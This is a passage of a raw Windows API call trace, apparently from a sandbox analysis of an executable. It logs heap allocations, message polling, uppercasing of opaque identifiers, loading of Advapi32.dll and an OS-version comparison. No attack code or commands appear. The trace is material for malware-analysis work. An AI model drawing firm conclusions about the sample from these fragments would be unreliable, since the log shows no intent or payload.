lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.291] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.291] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.291] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.295] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.295] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.295] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.295] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.295] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.296] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.296] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.296] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.296] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0208.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.297] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.297] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.297] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.298] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0208.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0208.298] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.300] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0208.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.303] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.305] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.305] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.306] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 